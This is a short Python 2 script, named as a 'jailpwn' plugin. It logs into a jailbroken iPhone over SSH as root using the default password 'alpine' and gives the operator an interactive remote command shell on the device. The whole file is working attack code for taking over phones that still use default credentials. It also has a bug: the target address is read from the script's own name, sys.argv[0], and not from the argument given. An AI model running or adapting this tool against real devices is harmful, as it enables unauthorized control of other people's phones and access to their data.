#!/usr/bin/python

import paramiko  
import sys,time
import os, argparse

__plugin__      = "jailpwn.plugin"

iphoneip = sys.argv[0]

def usage():
       if len(sys.argv) != 2:
               print ""
               sys.exit(1)
 
def exploit(iphoneip,cmd):
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        ssh.connect(iphoneip,username='root',password='alpine')
        stdin, stdout, stderr = ssh.exec_command(cmd)
        resp = stdout.readlines()
        print resp     
        ssh.close()
 
 
usage()
time.sleep(1.3)
cmd = " "
while (cmd != "quit"):
        try:
                cmd = raw_input("shell:iphone ~$ ")
                exploit(iphoneip,cmd)
        except KeyboardInterrupt:
                print "\nQuiting . . \n"
                sys.exit(1)
